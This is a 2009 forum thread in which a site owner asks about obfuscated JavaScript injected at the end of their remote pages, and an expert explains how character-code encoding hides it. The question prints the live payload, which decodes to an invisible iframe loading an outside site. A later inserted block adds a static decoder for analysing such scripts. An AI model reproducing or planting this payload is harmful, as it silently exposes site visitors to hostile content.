Solved

Javascript Added to bottom of site - Virus

Posted on 2009-05-05
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this. The following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there? Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Question by:jimbinho
8 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304108
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 

Author Comment

by:jimbinho
ID: 24304137
Hi,

Thanks for this. I think to be more specific what I am looking for is: what the code does when scrambled, as I am assuming it is scrambled JavaScript. I would also like to know how anyone would do this, and if anyone has seen anything like this before, can they shed any light?

Thanks
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304167
Here is what it translates as...
iframeCode.jpg
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24305101
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>
<body>
<script type="text/javascript">
// Print each character of the string next to its numeric character code.
var str = '<iframe width="480"';
for ( var i = 0; i < str.length; i++ ) {
  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />' );
}
</script>
</body>
</html>


0
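The encoding described in the comment above can be reversed by reading the script as text, without running it. The following is an added example, not code from this thread: it finds script blocks that pair a `split()` delimiter with `String.fromCharCode`, decodes the matching string literal, and reports any iframe `src` it contains and whether the script sits after the closing `</html>` tag, as in the question. The function name `decodeCharCodePayloads`, the delimiter `QzQ`, the sample page and the `example.invalid` URL are constructed for illustration.

```javascript
// Added example: static decoder for delimiter-joined character-code payloads.
// It only parses text; nothing is evaluated, rendered or fetched.

// Constructed sample page (not the payload from the question): same shape,
// hypothetical delimiter "QzQ", placeholder URL under example.invalid.
const SAMPLE_PAGE =
  '<html><body>ok</body></html><script type="text/javascript">var a = "' +
  'QzQ60QzQ105QzQ102QzQ114QzQ97QzQ109QzQ101QzQ32QzQ115QzQ114QzQ99QzQ61QzQ34' +
  'QzQ104QzQ116QzQ116QzQ112QzQ58QzQ47QzQ47QzQ101QzQ120QzQ97QzQ109QzQ112' +
  'QzQ108QzQ101QzQ46QzQ105QzQ110QzQ118QzQ97QzQ108QzQ105QzQ100QzQ47QzQ120' +
  'QzQ34QzQ62QzQ60QzQ47QzQ105QzQ102QzQ114QzQ97QzQ109QzQ101QzQ62' +
  '";var b = a.split("QzQ");var c = "";for (var i=1; i<b.length; i++)' +
  '{c+=String.fromCharCode(b[i]);}document.write(c)</script>';

function decodeCharCodePayloads(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    if (!/String\.fromCharCode/.test(body)) continue;
    // A script appended after </html> was not written by the page template.
    const afterHtmlClose = /<\/html\s*>/i.test(html.slice(0, m.index));
    const splitRe = /\.split\(\s*(["'])(.+?)\1\s*\)/g;
    let s;
    while ((s = splitRe.exec(body)) !== null) {
      const delimiter = s[2];
      const esc = delimiter.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
      // Only string literals that are purely (delimiter + digits) repeated.
      const litRe = new RegExp(`(["'])((?:${esc}\\d{1,7})+)\\1`, "g");
      let l;
      while ((l = litRe.exec(body)) !== null) {
        const decoded = l[2].split(delimiter).slice(1)
          .map((n) => String.fromCharCode(Number(n))).join("");
        const iframeSrcs = [...decoded.matchAll(
          /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)].map((x) => x[1]);
        findings.push({ delimiter, decoded, iframeSrcs, afterHtmlClose });
      }
    }
  }
  return findings;
}

console.log(JSON.stringify(decodeCharCodePayloads(SAMPLE_PAGE), null, 2));
```

Run it with Node.js against a saved copy of the served page (the remote copy, since the local files are clean) to see what the injected block would have written.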

 

Author Comment

by:jimbinho
ID: 24306426
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 500 total points
ID: 24306495
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0
 

Author Closing Comment

by:jimbinho
ID: 31577958
Appreciate the help
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24421987
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0
